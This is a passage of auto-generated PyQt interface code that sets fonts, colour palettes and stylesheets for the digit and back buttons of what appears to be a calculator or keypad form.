self.eight.setMinimumSize(QtCore.QSize(0, 0))
self.eight.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.eight.setFont(font)
self.eight.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.eight.setIconSize(QtCore.QSize(20, 20))
self.eight.setShortcut("")
self.eight.setCheckable(False)
self.eight.setObjectName("eight")
self.verticalLayout_3.addWidget(self.eight)
self.five = QtWidgets.QPushButton(Form)
self.five.setMinimumSize(QtCore.QSize(0, 0))
self.five.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 52, 52))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(167, 250, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 52, 52))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(167, 250, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(167, 250, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
self.five.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.five.setFont(font)
self.five.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.five.setIconSize(QtCore.QSize(20, 20))
self.five.setShortcut("")
self.five.setCheckable(False)
self.five.setObjectName("five")
self.verticalLayout_3.addWidget(self.five)
self.two = QtWidgets.QPushButton(Form)
self.two.setMinimumSize(QtCore.QSize(0, 0))
self.two.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
self.two.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.two.setFont(font)
self.two.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.two.setIconSize(QtCore.QSize(20, 20))
self.two.setShortcut("")
self.two.setCheckable(False)
self.two.setObjectName("two")
self.verticalLayout_3.addWidget(self.two)
self.zero = QtWidgets.QPushButton(Form)
self.zero.setMinimumSize(QtCore.QSize(0, 0))
self.zero.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.zero.setFont(font)
self.zero.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.zero.setIconSize(QtCore.QSize(20, 20))
self.zero.setShortcut("")
self.zero.setCheckable(False)
self.zero.setObjectName("zero")
self.verticalLayout_3.addWidget(self.zero)
self.horizontalLayout.addLayout(self.verticalLayout_3)
self.verticalLayout_4 = QtWidgets.QVBoxLayout()
self.verticalLayout_4.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.back = QtWidgets.QPushButton(Form)
self.back.setMinimumSize(QtCore.QSize(0, 0))
self.back.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(True)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(75)
font.setStrikeOut(False)
font.setKerning(True)
self.back.setFont(font)
self.back.setIconSize(QtCore.QSize(20, 20))
self.back.setShortcut("")
self.back.setCheckable(False)
self.back.setObjectName("back")
self.verticalLayout_4.addWidget(self.back)
self.nine = QtWidgets.QPushButton(Form)
self.nine.setMinimumSize(QtCore.QSize(0, 0))
self.nine.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
self.nine.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.nine.setFont(font)
self.nine.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.nine.setIconSize(QtCore.QSize(20, 20))
self.nine.setShortcut("")
self.nine.setCheckable(False)
self.nine.setObjectName("nine")
self.verticalLayout_4.addWidget(self.nine)
self.six = QtWidgets.QPushButton(Form)
self.six.setMinimumSize(QtCore.QSize(0, 0))
self.six.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(56, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(56, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(56, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(85, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.six.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.six.setFont(font)
self.six.setLayoutDirection(QtCore.Qt.LeftToRight)
self.six.setAutoFillBackground(False)
self.six.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.six.setIconSize(QtCore.QSize(20, 20))
self.six.setShortcut("")
self.six.setCheckable(False)
self.six.setObjectName("six")
self.verticalLayout_4.addWidget(self.six)
self.three = QtWidgets.QPushButton(Form)
self.three.setMinimumSize(QtCore.QSize(0, 0))
self.three.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 70, 70))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 31, 31))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(81, 111, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 52, 52))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 25, 25))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 27, 27))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(209, 222, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.NoRole, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 47, 47))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 70, 70))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 31, 31))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(81, 111, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 52, 52))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 25, 25))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 27, 27))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(209, 222, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.NoRole, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 47, 47))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
